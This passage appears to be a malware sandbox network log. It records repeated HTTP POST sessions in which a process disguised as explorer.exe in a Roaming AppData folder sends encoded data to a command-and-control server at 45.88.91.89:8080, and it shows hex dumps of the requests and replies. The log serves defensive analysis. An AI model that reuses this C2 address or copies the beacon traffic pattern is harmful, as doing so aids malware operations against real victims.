                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 07 28 00 2b 56 25 15 02 1d 27 13 35 1c 3e 06 21 5a 2d 2f 33 02 26 34 27 1d 2b 30 2e 50 2a 24 37 58 29 33 0b 1e 23 3f 38 12 2e 1c 2f 5f 0d 11 3b 01 20 2d 2a 11 2c 5b 34 04 3e 10 3e 05 3c 01 35 12 3d 07 34 11 27 2b 07 0c 25 03 31 08 3c 3a 28 0d 2b 05 2b 02 2e 2f 3d 59 25 1f 2f 57 0d 1e 24 0a 2b 22 29 13 20 2b 20 5e 36 04 21 59 3d 37 22 1e 22 00 2b 5c 31 10 03 5e 26 02 28 1d 23 33 24 5b 25 30 37 57 24 39 2c 0d 32 3f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$(+V%'5>!Z-/3&4'+0.P*$7X)3#?8./_; -*,[4>><5=4'+%1<:(++./=Y%/W$+") + ^6!Y=7""+\1^&(#3$[%07W$9,2?.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.64995245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:42.207834959 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:42.563332081 CET2568OUTData Raw: 56 55 58 5c 56 54 50 55 5b 5f 52 55 59 5f 57 5f 57 5e 5f 59 50 5b 56 5b 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VUX\VTPU[_RUY_W_W^_YP[V[_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9<Z0= +4Y%,4$?X<;_'_ $.!B'0;$[' \,>
                                                      Dec 13, 2024 14:33:43.293193102 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:43.526324034 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.64995745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:43.773684978 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:44.125982046 CET2568OUTData Raw: 56 53 5d 52 53 59 55 50 5b 5f 52 55 59 5d 57 5d 57 58 5f 5d 50 5e 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS]RSYUP[_RUY]W]WX_]P^VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.?+['>'V<,<0/(V' (4&; +[%-='?-=$[' \,6
                                                      Dec 13, 2024 14:33:44.955610991 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:45.189002037 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.64996245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:45.429943085 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:45.782121897 CET2568OUTData Raw: 56 5a 58 5f 56 54 55 52 5b 5f 52 55 59 5f 57 58 57 5a 5f 5e 50 5f 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX_VTUR[_RUY_WXWZ_^P_VY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["./#';V<<%/#0#]?40-X4#^&=9@%.,-$[' \,>
                                                      Dec 13, 2024 14:33:46.515322924 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:46.749064922 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:46 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.64996545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:46.995266914 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:47.344631910 CET2568OUTData Raw: 53 56 5d 59 53 59 55 5e 5b 5f 52 55 59 51 57 59 57 5b 5f 58 50 53 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]YSYU^[_RUYQWYW[_XPSV__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^.<^3'W?<$0<(0?#^+7'[&()Z "(&.9G3[-=$[' \,
                                                      Dec 13, 2024 14:33:48.091969013 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:48.313396931 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.64997145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:48.556397915 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:48.907146931 CET2568OUTData Raw: 53 57 58 5c 56 55 55 50 5b 5f 52 55 59 50 57 52 57 5d 5f 5c 50 59 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX\VUUP[_RUYPWRW]_\PYVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_.3Z3>8+,(X3$$#]<$[$(9#$29$$Y8=$[' \,
                                                      Dec 13, 2024 14:33:49.642421007 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:49.881211996 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.64997245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:48.654072046 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:49.000854969 CET1456OUTData Raw: 56 5a 58 5c 53 58 50 53 5b 5f 52 55 59 5c 57 59 57 5c 5f 58 50 58 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX\SXPS[_RUY\WYW\_XPXV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!_,<'-;+<3<0S%, ?7'>""4&=53=;,$[' \,2
                                                      Dec 13, 2024 14:33:49.742472887 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:49.977381945 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 12 2b 17 2b 11 27 3b 28 56 24 03 00 00 3e 01 0f 5b 3a 3f 2f 03 33 24 37 56 3f 0a 21 0f 2a 37 33 1c 3d 55 31 5d 34 06 24 56 2d 1c 2f 5f 0d 11 3b 06 23 2e 0f 02 2f 03 37 11 2a 3e 03 1a 3f 11 1b 5b 3e 58 20 58 24 05 2e 53 32 13 00 13 29 39 28 0b 28 15 0e 5d 39 3f 21 1b 25 25 2f 57 0d 1e 24 09 3c 22 3d 13 22 3b 20 16 22 3d 22 01 3d 34 22 1d 36 17 20 01 26 58 39 19 27 3c 38 57 21 33 28 12 25 55 3c 0b 26 3a 3f 54 26 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'++';(V$>[:?/3$7V?!*73=U1]4$V-/_;#./7*>?[>X X$.S2)9((]9?!%%/W$<"="; "="=4"6 &X9'<8W!3(%U<&:?T&/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.64997745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:50.119132042 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:50.469595909 CET2564OUTData Raw: 53 56 5d 5a 56 5c 50 50 5b 5f 52 55 59 59 57 5e 57 5a 5f 5e 50 52 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]ZV\PP[_RUYYW^WZ_^PRVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.$>+?;3<'<7<;$9^4/[&>F$=/8-$[' \,2
                                                      Dec 13, 2024 14:33:51.208178997 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:51.441313028 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:51 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.64997945.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:51.679011106 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:52.032130003 CET2568OUTData Raw: 53 55 5d 5a 56 55 55 53 5b 5f 52 55 59 5b 57 5a 57 5a 5f 52 50 5d 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SU]ZVUUS[_RUY[WZWZ_RP]V__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",<3_$?+/<3<'<<+' $]=X#+Y1.G%= _8-$[' \,.
                                                      Dec 13, 2024 14:33:52.814378977 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:53.049446106 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.64998545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:53.319369078 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:53.672761917 CET2568OUTData Raw: 53 55 58 5f 56 59 55 54 5b 5f 52 55 59 50 57 59 57 5a 5f 53 50 5b 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SUX_VYUT[_RUYPWYWZ_SP[VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z,?/'#<?$/?'(4?0]:4'^%-!F03;$[' \,
                                                      Dec 13, 2024 14:33:54.406219006 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:54.641321898 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.64999045.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:54.884495974 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      61192.168.2.64999245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:55.105959892 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:55.454009056 CET1456OUTData Raw: 56 57 58 5c 56 55 50 52 5b 5f 52 55 59 5e 57 58 57 58 5f 59 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX\VUPR[_RUY^WXWX_YPSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",?7Z$=<??<[0/(U0#Y(4$(5_4+1=3--$[' \,
                                                      Dec 13, 2024 14:33:56.210119963 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:56.445296049 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5a 3f 39 33 52 32 05 24 12 27 3e 3e 06 29 11 0b 58 3a 3f 01 03 30 42 24 0e 3c 0d 21 0f 3e 24 2f 58 2a 0a 3e 05 37 01 27 09 2d 0c 2f 5f 0d 11 3b 03 23 00 32 5b 2f 13 2b 12 2a 3d 3e 00 3c 3f 32 06 3e 10 02 10 33 2b 26 53 31 3d 3a 1d 29 39 27 53 3f 02 2f 06 2e 02 07 5f 25 35 2f 57 0d 1e 27 55 3c 22 39 1d 23 16 15 07 36 3e 3d 13 3e 1d 3e 1d 35 07 37 5d 32 2d 3d 5d 27 2f 3c 57 21 20 2b 05 26 33 27 52 26 29 20 0a 25 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'Z?93R2$'>>)X:?0B$<!>$/X*>7'-/_;#2[/+*=><?2>3+&S1=:)9'S?/._%5/W'U<"9#6>=>>57]2-=]'/<W! +&3'R&) %/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      62192.168.2.64999345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:55.227169037 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:55.578948021 CET2568OUTData Raw: 56 56 58 58 53 58 55 57 5b 5f 52 55 59 5d 57 5a 57 5e 5f 5f 50 5e 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VVXXSXUW[_RUY]WZW^__P^V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":7'><<,(Z0(0;?$#$]!Z 2X$>"'_8-$[' \,6
                                                      Dec 13, 2024 14:33:56.357489109 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:56.589221001 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      63192.168.2.64999845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:56.838886023 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:57.188438892 CET2568OUTData Raw: 53 56 5d 59 56 5f 50 55 5b 5f 52 55 59 5d 57 58 57 58 5f 5d 50 59 56 5f 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]YV_PU[_RUY]WXWX_]PYV__AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".Z<&.,<%<$S3<<&;&4$%-!'>+-=$[' \,6
                                                      Dec 13, 2024 14:33:57.979693890 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:58.215620995 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:57 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      64192.168.2.65000345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:58.466857910 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
